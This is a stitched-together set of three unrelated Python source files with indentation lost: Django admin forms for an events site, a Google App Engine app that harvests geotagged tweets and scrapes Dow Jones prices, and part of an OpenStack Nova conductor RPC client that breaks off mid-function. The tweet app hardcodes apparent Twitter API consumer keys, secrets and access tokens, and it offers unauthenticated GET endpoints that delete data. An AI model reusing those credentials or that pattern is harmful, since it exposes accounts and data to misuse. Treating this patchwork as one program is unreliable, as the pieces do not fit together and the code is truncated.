token_protection = forms.BooleanField(required=False)
hd = forms.BooleanField(required=False, label='HD')
def __init__(self, *args, **kwargs):
disable_token_protection = kwargs.pop(
'disable_token_protection',
False
)
super(VidlyURLForm, self).__init__(*args, **kwargs)
if disable_token_protection:
self.fields['token_protection'].widget.attrs['disabled'] = (
'disabled'
)
self.fields['token_protection'].required = True
self.fields['token_protection'].help_text = (
'Required for non-public events'
)
def clean_url(self):
# annoyingly, we can't use forms.URLField since it barfs on
# Basic Auth urls. Instead, let's just make some basic validation
# here
value = self.cleaned_data['url']
if ' ' in value or '://' not in value:
raise forms.ValidationError('Not a valid URL')
value, error = url_transformer.run(value)
if error:
raise forms.ValidationError(error)
return value
class EventsAutocompleteForm(BaseForm):
q = forms.CharField(required=True, max_length=200)
max = forms.IntegerField(required=False, min_value=1, max_value=20)
class AcceptSuggestedEventForm(BaseModelForm):
class Meta:
model = SuggestedEvent
fields = ('review_comments',)
widgets = {
'review_comments': forms.Textarea(attrs={'rows': 3})
}
class TagEditForm(BaseModelForm):
class Meta:
model = Tag
fields = ('name',)
def clean_name(self):
value = self.cleaned_data['name']
other_tags = Tag.objects.filter(name__iexact=value)
if self.instance:
other_tags = other_tags.exclude(id=self.instance.id)
if other_tags.exists():
raise forms.ValidationError(
'Used by another tag. Consider merging.'
)
return value
class TagMergeRepeatedForm(BaseForm):
keep = forms.ChoiceField(
label='Name to keep',
widget=forms.widgets.RadioSelect()
)
def __init__(self, this_tag, *args, **kwargs):
super(TagMergeRepeatedForm, self).__init__(*args, **kwargs)
def describe_tag(tag):
count = Event.objects.filter(tags=tag).count()
if count == 1:
tmpl = '%s (%d time)'
else:
tmpl = '%s (%d times)'
return tmpl % (tag.name, count)
self.fields['keep'].choices = [
(x.id, describe_tag(x))
for x in Tag.objects.filter(name__iexact=this_tag.name)
]
class TagMergeForm(BaseForm):
name = forms.CharField()
def __init__(self, this_tag, *args, **kwargs):
super(TagMergeForm, self).__init__(*args, **kwargs)
self.this_tag = this_tag
def clean_name(self):
value = self.cleaned_data['name']
other_tags = (
Tag.objects
.filter(name__iexact=value)
.exclude(id=self.this_tag.id)
)
if not other_tags.exists():
raise forms.ValidationError('Not found')
return value
class VidlyResubmitForm(VidlyURLForm):
id = forms.IntegerField(widget=forms.widgets.HiddenInput())
class URLMatchForm(BaseModelForm):
class Meta:
model = URLMatch
exclude = ('use_count',)
def clean_name(self):
name = self.cleaned_data['name'].strip()
if URLMatch.objects.filter(name__iexact=name):
raise forms.ValidationError("URL matcher name already in use")
return name
def clean_string(self):
string = self.cleaned_data['string']
try:
re.compile(string)
except Exception as e:
raise forms.ValidationError(e)
return string
class SuggestedEventCommentForm(BaseModelForm):
class Meta:
model = SuggestedEventComment
fields = ('comment',)
widgets = {
'comment': forms.Textarea(attrs={'rows': 3})
}
class DiscussionForm(BaseModelForm):
class Meta:
model = Discussion
fields = ('enabled', 'closed', 'moderate_all', 'notify_all',
'moderators')
class CommentEditForm(BaseModelForm):
class Meta:
model = Comment
fields = ('status', 'comment', 'flagged')
class CommentsFilterForm(BaseForm):
user = forms.CharField(required=False)
comment = forms.CharField(required=False)
status = forms.ChoiceField(
required=False,
choices=(
(('', 'ALL'),) + Comment.STATUS_CHOICES + (('flagged', 'Flagged'),)
)
)
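# Note: the class below shadows the CommentsFilterForm defined just above;
# it subclasses the previous binding of the same name and adds an extra
# `event` field.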
class CommentsFilterForm(CommentsFilterForm):
event = forms.CharField(required=False)
class EventAssignmentForm(BaseModelForm):
class Meta:
model = EventAssignment
fields = ('locations', 'users')
def __init__(self, *args, **kwargs):
super(EventAssignmentForm, self).__init__(*args, **kwargs)
users = (
User.objects
.extra(select={
'email_lower': 'LOWER(email)'
})
.filter(is_active=True, is_staff=True)
.order_by('email_lower')
)
def describe_user(user):
ret = user.email
if user.first_name or user.last_name:
name = (user.first_name + ' ' + user.last_name).strip()
ret += ' (%s)' % name
return ret
self.fields['users'].choices = [
(x.pk, describe_user(x)) for x in users
]
self.fields['users'].required = False
self.fields['users'].help_text = 'Start typing to find users.'
locations = (
Location.objects.filter(is_active=True)
.order_by('name')
)
if self.instance.event.location:
locations = locations.exclude(pk=self.instance.event.location.pk)
self.fields['locations'].choices = [
(x.pk, x.name) for x in locations
]
self.fields['locations'].required = False
self.fields['locations'].help_text = 'Start typing to find locations.'
class EventTranscriptForm(BaseModelForm):
class Meta:
model = Event
fields = ('transcript', )
class QuestionForm(BaseModelForm):
class Meta:
model = Question
fields = ('question',)
class EventSurveyForm(BaseForm):
survey = forms.ChoiceField(
widget=forms.widgets.RadioSelect()
)
def __init__(self, *args, **kwargs):
super(EventSurveyForm, self).__init__(*args, **kwargs)
def describe_survey(survey):
output = survey.name
if not survey.active:
output += ' (not active)'
count_questions = Question.objects.filter(survey=survey).count()
if count_questions == 1:
output += ' (1 question)'
else:
output += ' (%d questions)' % count_questions
return output
self.fields['survey'].choices = [
('0', 'none')
] + [
(x.id, describe_survey(x)) for x in Survey.objects.all()
]
class PictureForm(BaseModelForm):
class Meta:
model = Picture
fields = ('file', 'notes', 'default_placeholder', 'is_active')
help_texts = {
'is_active': (
"Only active pictures is a choice when users pick picture."
),
}
class AutocompeterUpdateForm(BaseForm):
verbose = forms.BooleanField(required=False)
max_ = forms.IntegerField(required=False)
all = forms.BooleanField(required=False)
flush_first = forms.BooleanField(required=False)
since = forms.IntegerField(
required=False,
help_text="Minutes since last modified"
)
def clean_since(self):
value = self.cleaned_data['since']
if value:
print "Minutes", int(value)
value = datetime.timedelta(minutes=int(value))
return value
class ISODateTimeField(forms.DateTimeField):
def strptime(self, value, __):
return dateutil.parser.parse(value)
class EventsDataForm(BaseForm):
since = ISODateTimeField(required=False)
class TriggerErrorForm(BaseForm):
message = forms.CharField()
capture_with_raven = forms.BooleanField(required=False)
class ReindexRelatedContentForm(BaseForm):
all = forms.BooleanField(required=False)
since = forms.IntegerField(
required=False,
help_text='minutes',
widget=forms.widgets.NumberInput(attrs={
'style': 'width: 200px',
})
)
delete_and_recreate = forms.BooleanField(required=False)
class RelatedContentTestingForm(BaseForm):
event = forms.CharField(
help_text="Title, slug or ID"
)
use_title = forms.BooleanField(required=False)
boost_title = forms.FloatField()
use_tags = forms.BooleanField(required=False)
boost_tags = forms.FloatField()
size = forms.IntegerField()
def clean_event(self):
event = self.cleaned_data['event'].strip()
try:
if not event.isdigit():
raise Event.DoesNotExist
return Event.objects.get(id=event)
except Event.DoesNotExist:
try:
return Event.objects.get(slug__iexact=event)
except Event.DoesNotExist:
try:
return Event.objects.get(title__iexact=event)
except Event.DoesNotExist:
raise forms.ValidationError("Event can't be found")
except Event.MultipleObjectsReturned:
raise forms.ValidationError(
'Event title ambiguous. Use slug or ID.'
)
def clean(self):
cleaned_data = super(RelatedContentTestingForm, self).clean()
if 'use_title' in cleaned_data and 'use_tags' in cleaned_data:
if not (cleaned_data['use_title'] or cleaned_data['use_tags']):
raise forms.ValidationError(
'One of Use title OR Use tags must be chosen'
)
return cleaned_data
class EventDurationForm(BaseModelForm):
class Meta:
model = Event
fields = ('duration',)
def __init__(self, *args, **kwargs):
super(EventDurationForm, self).__init__(*args, **kwargs)
self.fields['duration'].required = False
self.fields['duration'].help_text = (
"Note! If you remove this value (make it blank), it will be "
"unset and automatically be re-evaluated."
)
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# GAE stuff
import os
import urllib
from google.appengine.api import users
from google.appengine.ext import ndb
import jinja2
import webapp2
import logging
import json
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__), "templates"))
)
GEO_LIST = [
["LA","34.002854,-118.110295,100mi"],
["NYC","40.767024,-73.973884,100mi"],
["CHI","41.849591,-87.690270,100mi"],
["ATL","33.759293,-84.387817,100mi"]
]
Q_TERMS = ["i feel","i am feeling","i'm feeling","i dont feel","i'm","Im","I am","makes me"]
GEO_DICT = dict(GEO_LIST)  # city code -> "lat,lng,radius" geocode string
class Tweet(ndb.Model):
searchTerm = ndb.StringProperty()
searchGeo = ndb.StringProperty()
searchGeoPlace = ndb.StringProperty()
processed = ndb.BooleanProperty(default=False)
timestamp = ndb.DateTimeProperty(auto_now_add=True)
id = ndb.IntegerProperty()
text = ndb.StringProperty()
created_at = ndb.DateTimeProperty()
geo = ndb.StringProperty()
favorite_count = ndb.IntegerProperty()
retweet_count = ndb.IntegerProperty()
class DJI(ndb.Model):
dji = ndb.FloatProperty()
timestamp = ndb.DateTimeProperty(auto_now_add=True)
import tweepy
CONSUMER_KEY = '63c0lXM51rxZ2cZUr3QcKKR9q'
CONSUMER_SECRET = 'Kxu44kTkweAkfAVtYVTe2y2Q8FdtkkKFPaMacyihRs1d9eRuU4'
ACCESS_TOKEN_KEY = '37201527-wnO8ILKImZ4SDzTNF3RNTQ9UMZV4oYeBF0t5lA2yU'
ACCESS_TOKEN_SECRET = 'QHkYL3Vk0E1sj4WPPe2EKb1KbEke0SuW3K0Y6Ag4N4GeS'
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN_KEY, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
##########################################################################
def json_date_handler(obj):
# return obj.isoformat() if hasattr(obj, 'isoformat') else obj
import datetime
return obj.strftime("%Y-%m-%d %H:%M:%S") if isinstance(obj,datetime.datetime) else obj
class NDBStatsGeoHandler(webapp2.RequestHandler):
def get(self):
stats = []
for q in GEO_LIST:
cnt = Tweet.query(Tweet.searchGeo==q[1]).count()
stats.append({"q":q[0],"cnt":cnt})
self.response.out.write(json.dumps(stats,default=json_date_handler))
class NDBStatsHandler(webapp2.RequestHandler):
def get(self):
stats = []
for q in Q_TERMS:
cnt = Tweet.query(Tweet.searchTerm==q).count()
stats.append({"q":q,"cnt":cnt})
stats.append({"q":"TOTAL","cnt":Tweet.query().count()})
template_values = {
'arr':stats,
'dji_cnt':DJI.query().count()
}
template = JINJA_ENVIRONMENT.get_template('ndb_stats.html')
self.response.out.write(template.render(template_values))
class CronDummyHandler(webapp2.RequestHandler):
def get(self):
pass
class CronFetchTweetHandler(webapp2.RequestHandler):
def get(self):
cnt = 0
for city in GEO_LIST:
for q in Q_TERMS:
cnt += self.__get_tweet(q=q,geocode=city[1])
logging.info('CRON cron_fetch_tweet DONE - %d tweets'%(cnt,))
#self.response.out.write(str(cnt))
def __get_tweet(self,q='pizza',geocode="40.767024,-73.973884,100mi"):
if Tweet.query(Tweet.searchTerm==q).count() > 0:
since_id = Tweet.query(Tweet.searchTerm==q).order(-Tweet.id).fetch(1)[0].id
else:
since_id = 0
logging.info('__get_tweet: q=%s,geocode=%s,since_id=%d' % (q,geocode,since_id))
rst = api.search(q=q,geocode=geocode,since_id=since_id,count=100)
tws = []
for t in rst:
tweet = Tweet( searchTerm = q,
searchGeo = geocode,
id = t.id,
text = t.text,
created_at = t.created_at,
geo = str(t.geo),
favorite_count = t.favorite_count,
retweet_count = t.retweet_count
)
#tweet.put()
tws.append(tweet)
ndb.put_multi(tws)
return len(rst)
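# Illustrative call pattern (not in the original source): since_id is the
# highest tweet id already stored for this search term, so each cron run
# only fetches tweets newer than the previous run, e.g.
#   self.__get_tweet(q="i feel", geocode=GEO_DICT["NYC"])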
class CronFetchDJIHandler(webapp2.RequestHandler):
def get(self):
from HTMLParser import HTMLParser
class DJIHTMLParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.found = False
self.dji = 0
def handle_starttag(self, tag, attrs):
for a in attrs:
if a[0] == 'id' and a[1] == 'yfs_l10_^dji':
#print "n %s v %s" % (a[0],a[1])
self.found = True
def handle_data(self, data):
if self.found is True:
#print "Encountered some data :", data
self.dji = data
self.found = False
baseurl = "http://finance.yahoo.com/q/bc?s=%5EDJI+Basic+Chart"
htmlcontent = "".join(urllib.urlopen(baseurl))
parser = DJIHTMLParser()
parser.feed(htmlcontent)
dji_price = float(parser.dji.replace(',',''))
dj = DJI(dji = dji_price)
dj.put()
print dji_price
self.response.out.write(dji_price)
class NDBDeleteHandler(webapp2.RequestHandler):
def get(self):
q = self.request.get('q')
keys = Tweet.query(Tweet.searchTerm==q).fetch(keys_only=True)
# toDel = ndb.get_multi(keys)
# for d in toDel:
# print d.created_at
ndb.delete_multi(keys)
self.response.write(len(keys))
class NDBDeleteAllHandler(webapp2.RequestHandler):
def get(self):
cnt1 = Tweet.query().count()
cnt2 = DJI.query().count()
errorMsg = ""
while Tweet.query().count()>0 or DJI.query().count()>0:
try:
while Tweet.query().count() > 0:
keys = Tweet.query().fetch(2000,keys_only=True)
ndb.delete_multi(keys)
while DJI.query().count() > 0:
keys = DJI.query().fetch(2000,keys_only=True)
ndb.delete_multi(keys)
except Exception, e: #DeadlineExceededErrors
errorMsg = errorMsg + str(e)
msg = "deleted: %d Tweet objects, %d DJI objects." % (cnt1,cnt2)
self.response.write(msg + "</br></br></br>" + errorMsg)
class DJIJsonHandler(webapp2.RequestHandler):
def get(self):
import json
jd = json.dumps([t.to_dict() for t in DJI.query().order(DJI.timestamp).fetch()],default=json_date_handler)
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(jd)
class TweetJsonDumpHandler(webapp2.RequestHandler):
def get(self):
import json
q = self.request.get('q')
if not q:
jd = json.dumps([t.to_dict() for t in Tweet.query().fetch()],default=json_date_handler)
print "all"
else:
jd = json.dumps([t.to_dict() for t in Tweet.query(Tweet.searchTerm == q).fetch()],default=json_date_handler)
print q
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(jd)
class TweetJsonDownloadHandler(webapp2.RequestHandler):
def get(self):
try:
page = int(self.request.get('page'))
size = int(self.request.get('size'))
kwidx = str(self.request.get('kwidx'))
city = str(self.request.get('city'))
dl = int(self.request.get('dl'))
if not kwidx == 'all':
kwidx = int(kwidx)
if kwidx < 0 or kwidx > (len(Q_TERMS)-1):
raise Exception("kwidx")
if not city == 'all':
if not city in [o[0] for o in GEO_LIST]:
raise Exception("city")
if not dl in [0,1]:
raise Exception("dl")
if not kwidx == 'all' and not city == 'all':
raise Exception('index')
except Exception, e:
self.response.out.write("<h3>Please supply valid [page] [size] [kwidx] [city] [dl] para</h3>\
<strong>at least one of [kwidx] [city] must be all</strong> \
</br></br>\
[page] start from <i>1</i> <br>\
[size] page size, positive int, suggest <i>10000</i> <br>\
[kwidx] start from 0 to %d in %s or use <i>all</i><br>\
[city] in %s or use <i>all</i> <br>\
[dl] 0 or 1 whether to download\
" % (len(Q_TERMS)-1,str(Q_TERMS),str([o[0] for o in GEO_LIST])))
return
if kwidx == 'all' and city == 'all':
tws = Tweet.query().fetch(size,offset=(page-1)*size)
elif kwidx == 'all':
tws = Tweet.query(Tweet.searchGeo == GEO_DICT[city]).order(Tweet.timestamp).fetch(size,offset=(page-1)*size)
elif city == 'all':
tws = Tweet.query(Tweet.searchTerm == Q_TERMS[kwidx]).order(Tweet.timestamp).fetch(size,offset=(page-1)*size)
jd = json.dumps([t.to_dict() for t in tws],default=json_date_handler)
self.response.headers['Content-Type'] = 'application/json'
if dl == 1:
self.response.headers['Content-Disposition'] = "attachment;filename=Tweet.size-%d.page-%d.kwidx-%s.city-%s.cnt%d.json" % (size,page,str(kwidx),city,len(tws))
self.response.out.write(jd)
class MainHandler(webapp2.RequestHandler):
def get(self):
dicts = [o.to_dict() for o in DJI.query().order(DJI.timestamp).fetch()]
dots = [{'x':d['dji'],'y':str(d['timestamp'])} for d in dicts]
template_values = {
'dji':dots
}
template = JINJA_ENVIRONMENT.get_template('index.html')
self.response.out.write(template.render(template_values))
class TestHandler(webapp2.RequestHandler):
def get(self):
q = self.request.get('q')
if not q:
q = 'yale'
geocode = '37.781157,-122.398720,100mi'
if Tweet.query(Tweet.searchTerm==q).count() > 0:
since_id = Tweet.query(Tweet.searchTerm==q).order(-Tweet.id).fetch(1)[0].id
else:
since_id = 0
rst = api.search(q=q,geocode=geocode,since_id=since_id,count=100)
template_values = {
'tweets':rst
}
template = JINJA_ENVIRONMENT.get_template('test.html')
self.response.out.write(template.render(template_values))
app = webapp2.WSGIApplication([
('/', MainHandler),
# ('/I_am_sure_to_delete_all_ndb',NDBDeleteAllHandler),
('/test',TestHandler),
('/cron_fetch_tweet',CronFetchTweetHandler),
('/cron_fetch_dji',CronFetchDJIHandler),
('/cron_dummy',CronDummyHandler),
('/ndb_stats',NDBStatsHandler),
('/ndb_delete',NDBDeleteHandler),
('/json_tws_tmp',TweetJsonDumpHandler),
('/ndb_stats_geo',NDBStatsGeoHandler),
('/json_tws',TweetJsonDownloadHandler),
('/json_dji',DJIJsonHandler)
], debug=True)
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Client side of the conductor RPC API."""
from oslo.config import cfg
from nova.openstack.common import jsonutils
import nova.openstack.common.rpc.proxy
CONF = cfg.CONF
class ConductorAPI(nova.openstack.common.rpc.proxy.RpcProxy):
"""Client side of the conductor RPC API
API version history:
1.0 - Initial version.
1.1 - Added migration_update
1.2 - Added instance_get_by_uuid and instance_get_all_by_host
1.3 - Added aggregate_host_add and aggregate_host_delete
1.4 - Added migration_get
1.5 - Added bw_usage_update
1.6 - Added get_backdoor_port()
1.7 - Added aggregate_get_by_host, aggregate_metadata_add,
and aggregate_metadata_delete
1.8 - Added security_group_get_by_instance and
security_group_rule_get_by_security_group
1.9 - Added provider_fw_rule_get_all
1.10 - Added agent_build_get_by_triple
1.11 - Added aggregate_get
1.12 - Added block_device_mapping_update_or_create
1.13 - Added block_device_mapping_get_all_by_instance
1.14 - Added block_device_mapping_destroy
1.15 - Added instance_get_all_by_filters and
instance_get_all_hung_in_rebooting and
instance_get_active_by_window
Deprecated instance_get_all_by_host
1.16 - Added instance_destroy
1.17 - Added instance_info_cache_delete
1.18 - Added instance_type_get
1.19 - Added vol_get_usage_by_time and vol_usage_update
1.20 - Added migration_get_unconfirmed_by_dest_compute
1.21 - Added service_get_all_by
1.22 - Added ping
1.23 - Added instance_get_all
Un-Deprecate instance_get_all_by_host
1.24 - Added instance_get
1.25 - Added action_event_start and action_event_finish
1.26 - Added instance_info_cache_update
1.27 - Added service_create
1.28 - Added binary arg to service_get_all_by
1.29 - Added service_destroy
1.30 - Added migration_create
1.31 - Added migration_get_in_progress_by_host_and_node
1.32 - Added optional node to instance_get_all_by_host
1.33 - Added compute_node_create and compute_node_update
1.34 - Added service_update
1.35 - Added instance_get_active_by_window_joined
1.36 - Added instance_fault_create
1.37 - Added task_log_get, task_log_begin_task, task_log_end_task
1.38 - Added service name to instance_update
1.39 - Added notify_usage_exists
1.40 - Added security_groups_trigger_handler and
security_groups_trigger_members_refresh
Remove instance_get_active_by_window
1.41 - Added fixed_ip_get_by_instance, network_get,
instance_floating_address_get_all, quota_commit,
quota_rollback
1.42 - Added get_ec2_ids, aggregate_metadata_get_by_host
1.43 - Added compute_stop
"""
BASE_RPC_API_VERSION = '1.0'
def __init__(self):
super(ConductorAPI, self).__init__(
topic=CONF.conductor.topic,
default_version=self.BASE_RPC_API_VERSION)
def ping(self, context, arg, timeout=None):
arg_p = jsonutils.to_primitive(arg)
msg = self.make_msg('ping', arg=arg_p)
return self.call(context, msg, version='1.22', timeout=timeout)
def instance_update(self, context, instance_uuid, updates,
service=None):
updates_p = jsonutils.to_primitive(updates)
return self.call(context,
self.make_msg('instance_update',
instance_uuid=instance_uuid,
updates=updates_p,
service=service),
version='1.38')
def instance_get(self, context, instance_id):
msg = self.make_msg('instance_get',
instance_id=instance_id)
return self.call(context, msg, version='1.24')
def instance_get_by_uuid(self, context, instance_uuid):
msg = self.make_msg('instance_get_by_uuid',
instance_uuid=instance_uuid)
return self.call(context, msg, version='1.2')
def migration_get(self, context, migration_id):
msg = self.make_msg('migration_get', migration_id=migration_id)
return self.call(context, msg, version='1.4')
def migration_get_unconfirmed_by_dest_compute(self, context,
confirm_window,
dest_compute):
msg = self.make_msg('migration_get_unconfirmed_by_dest_compute',
confirm_window=confirm_window,
dest_compute=dest_compute)
return self.call(context, msg, version='1.20')
def migration_get_in_progress_by_host_and_node(self, context,
host, node):
msg = self.make_msg('migration_get_in_progress_by_host_and_node',
host=host, node=node)
return self.call(context, msg, version='1.31')
def migration_create(self, context, instance, values):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('migration_create', instance=instance_p,
values=values)
return self.call(context, msg, version='1.30')
def migration_update(self, context, migration, status):
migration_p = jsonutils.to_primitive(migration)
msg = self.make_msg('migration_update', migration=migration_p,
status=status)
return self.call(context, msg, version='1.1')
def aggregate_host_add(self, context, aggregate, host):
aggregate_p = jsonutils.to_primitive(aggregate)
msg = self.make_msg('aggregate_host_add', aggregate=aggregate_p,
host=host)
return self.call(context, msg, version='1.3')
def aggregate_host_delete(self, context, aggregate, host):
aggregate_p = jsonutils.to_primitive(aggregate)
msg = self.make_msg('aggregate_host_delete', aggregate=aggregate_p,
host=host)
return self.call(context, msg, version='1.3')
def aggregate_get(self, context, aggregate_id):
msg = self.make_msg('aggregate_get', aggregate_id=aggregate_id)
return self.call(context, msg, version='1.11')
def aggregate_get_by_host(self, context, host, key=None):
msg = self.make_msg('aggregate_get_by_host', host=host, key=key)
return self.call(context, msg, version='1.7')
def aggregate_metadata_add(self, context, aggregate, metadata,
set_delete=False):
aggregate_p = jsonutils.to_primitive(aggregate)
msg = self.make_msg('aggregate_metadata_add', aggregate=aggregate_p,
metadata=metadata,
set_delete=set_delete)
return self.call(context, msg, version='1.7')
def aggregate_metadata_delete(self, context, aggregate, key):
aggregate_p = jsonutils.to_primitive(aggregate)
msg = self.make_msg('aggregate_metadata_delete', aggregate=aggregate_p,
key=key)
return self.call(context, msg, version='1.7')
def aggregate_metadata_get_by_host(self, context, host, key):
msg = self.make_msg('aggregate_metadata_get_by_host', host=host,
key=key)
return self.call(context, msg, version='1.42')
def bw_usage_update(self, context, uuid, mac, start_period,
bw_in=None, bw_out=None,
last_ctr_in=None, last_ctr_out=None,
last_refreshed=None):
msg = self.make_msg('bw_usage_update',
uuid=uuid, mac=mac, start_period=start_period,
bw_in=bw_in, bw_out=bw_out,
last_ctr_in=last_ctr_in, last_ctr_out=last_ctr_out,
last_refreshed=last_refreshed)
return self.call(context, msg, version='1.5')
def get_backdoor_port(self, context):
msg = self.make_msg('get_backdoor_port')
return self.call(context, msg, version='1.6')
def security_group_get_by_instance(self, context, instance):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('security_group_get_by_instance',
instance=instance_p)
return self.call(context, msg, version='1.8')
def security_group_rule_get_by_security_group(self, context, secgroup):
secgroup_p = jsonutils.to_primitive(secgroup)
msg = self.make_msg('security_group_rule_get_by_security_group',
secgroup=secgroup_p)
return self.call(context, msg, version='1.8')
def provider_fw_rule_get_all(self, context):
msg = self.make_msg('provider_fw_rule_get_all')
return self.call(context, msg, version='1.9')
def agent_build_get_by_triple(self, context, hypervisor, os, architecture):
msg = self.make_msg('agent_build_get_by_triple',
hypervisor=hypervisor, os=os,
architecture=architecture)
return self.call(context, msg, version='1.10')
def block_device_mapping_update_or_create(self, context, values,
create=None):
msg = self.make_msg('block_device_mapping_update_or_create',
values=values, create=create)
return self.call(context, msg, version='1.12')
def block_device_mapping_get_all_by_instance(self, context, instance):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('block_device_mapping_get_all_by_instance',
instance=instance_p)
return self.call(context, msg, version='1.13')
def block_device_mapping_destroy(self, context, bdms=None,
instance=None, volume_id=None,
device_name=None):
bdms_p = jsonutils.to_primitive(bdms)
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('block_device_mapping_destroy',
bdms=bdms_p,
instance=instance_p, volume_id=volume_id,
device_name=device_name)
return self.call(context, msg, version='1.14')
def instance_get_all_by_filters(self, context, filters, sort_key,
sort_dir):
msg = self.make_msg('instance_get_all_by_filters',
filters=filters, sort_key=sort_key,
sort_dir=sort_dir)
return self.call(context, msg, version='1.15')
def instance_get_all_hung_in_rebooting(self, context, timeout):
msg = self.make_msg('instance_get_all_hung_in_rebooting',
timeout=timeout)
return self.call(context, msg, version='1.15')
def instance_get_active_by_window_joined(self, context, begin, end=None,
project_id=None, host=None):
msg = self.make_msg('instance_get_active_by_window_joined',
begin=begin, end=end, project_id=project_id,
host=host)
return self.call(context, msg, version='1.35')
def instance_destroy(self, context, instance):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('instance_destroy', instance=instance_p)
self.call(context, msg, version='1.16')
def instance_info_cache_delete(self, context, instance):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('instance_info_cache_delete', instance=instance_p)
self.call(context, msg, version='1.17')
def instance_type_get(self, context, instance_type_id):
msg = self.make_msg('instance_type_get',
instance_type_id=instance_type_id)
return self.call(context, msg, version='1.18')
def vol_get_usage_by_time(self, context, start_time):
start_time_p = jsonutils.to_primitive(start_time)
msg = self.make_msg('vol_get_usage_by_time', start_time=start_time_p)
return self.call(context, msg, version='1.19')
def vol_usage_update(self, context, vol_id, rd_req, rd_bytes, wr_req,
wr_bytes, instance, last_refreshed=None,
update_totals=False):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('vol_usage_update', vol_id=vol_id, rd_req=rd_req,
rd_bytes=rd_bytes, wr_req=wr_req,
wr_bytes=wr_bytes,
instance=instance_p, last_refreshed=last_refreshed,
update_totals=update_totals)
return self.call(context, msg, version='1.19')
def service_get_all_by(self, context, topic=None, host=None, binary=None):
msg = self.make_msg('service_get_all_by', topic=topic, host=host,
binary=binary)
return self.call(context, msg, version='1.28')
def instance_get_all(self, context):
msg = self.make_msg('instance_get_all')
return self.call(context, msg, version='1.23')
def instance_get_all_by_host(self, context, host, node=None):
msg = self.make_msg('instance_get_all_by_host', host=host, node=node)
return self.call(context, msg, version='1.32')
def instance_fault_create(self, context, values):
msg = self.make_msg('instance_fault_create', values=values)
return self.call(context, msg, version='1.36')
def action_event_start(self, context, values):
values_p = jsonutils.to_primitive(values)
msg = self.make_msg('action_event_start', values=values_p)
return self.call(context, msg, version='1.25')
def action_event_finish(self, context, values):
values_p = jsonutils.to_primitive(values)
msg = self.make_msg('action_event_finish', values=values_p)
return self.call(context, msg, version='1.25')
def instance_info_cache_update(self, context, instance, values):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('instance_info_cache_update',
instance=instance_p,
values=values)
return self.call(context, msg, version='1.26')
def service_create(self, context, values):
msg = self.make_msg('service_create', values=values)
return self.call(context, msg, version='1.27')
def service_destroy(self, context, service_id):
msg = self.make_msg('service_destroy', service_id=service_id)
return self.call(context, msg, version='1.29')
def compute_node_create(self, context, values):
msg = self.make_msg('compute_node_create', values=values)
return self.call(context, msg, version='1.33')
def compute_node_update(self, context, node, values, prune_stats=False):
node_p = jsonutils.to_primitive(node)
msg = self.make_msg('compute_node_update', node=node_p, values=values,
prune_stats=prune_stats)
return self.call(context, msg, version='1.33')
def service_update(self, context, service, values):
service_p = jsonutils.to_primitive(service)
msg = self.make_msg('service_update', service=service_p, values=values)
return self.call(context, msg, version='1.34')
def task_log_get(self, context, task_name, begin, end, host, state=None):
msg = self.make_msg('task_log_get', task_name=task_name,
begin=begin, end=end, host=host, state=state)
return self.call(context, msg, version='1.37')
def task_log_begin_task(self, context, task_name, begin, end, host,
task_items=None, message=None):
msg = self.make_msg('task_log_begin_task', task_name=task_name,
begin=begin, end=end, host=host,
task_items=task_items, message=message)
return self.call(context, msg, version='1.37')
def task_log_end_task(self, context, task_name, begin, end, host, errors,
message=None):
msg = self.make_msg('task_log_end_task', task_name=task_name,
begin=begin, end=end, host=host, errors=errors,
message=message)
return self.call(context, msg, version='1.37')
def notify_usage_exists(self, context, instance, current_period=False,
ignore_missing_network_data=True,
system_metadata=None, extra_usage_info=None):
instance_p = jsonutils.to_primitive(instance)
system_metadata_p = jsonutils.to_primitive(system_metadata)
extra_usage_info_p = jsonutils.to_primitive(extra_usage_info)
msg = self.make_msg('notify_usage_exists', instance=instance_p,
current_period=current_period,
ignore_missing_network_data=ignore_missing_network_data,
system_metadata=system_metadata_p,
extra_usage_info=extra_usage_info_p)
return self.call(context, msg, version='1.39')
def security_groups_trigger_handler(self, context, event, args):
args_p = jsonutils.to_primitive(args)
msg = self.make_msg('security_groups_trigger_handler', event=event,
args=args_p)
return self.call(context, msg, version='1.40')
def security_groups_trigger_members_refresh(self, context, group_ids):
msg = self.make_msg('security_groups_trigger_members_refresh',
group_ids=group_ids)
return self.call(context, msg, version='1.40')
def network_migrate_instance_start(self, context, instance, migration):
instance_p = jsonutils.to_primitive(instance)
migration_p = jsonutils.to_primitive(migration)
msg = self.make_msg('network_migrate_instance_start',
instance=instance_p, migration=migration_p)
return self.call(context, msg, version='1.41')
def network_migrate_instance_finish(self, context, instance, migration):
instance_p = jsonutils.to_primitive(instance)
migration_p = jsonutils.to_primitive(migration)
msg = self.make_msg('network_migrate_instance_finish',
instance=instance_p, migration=migration_p)
return self.call(context, msg, version='1.41')
def quota_commit(self, context, reservations):
reservations_p = jsonutils.to_primitive(reservations)
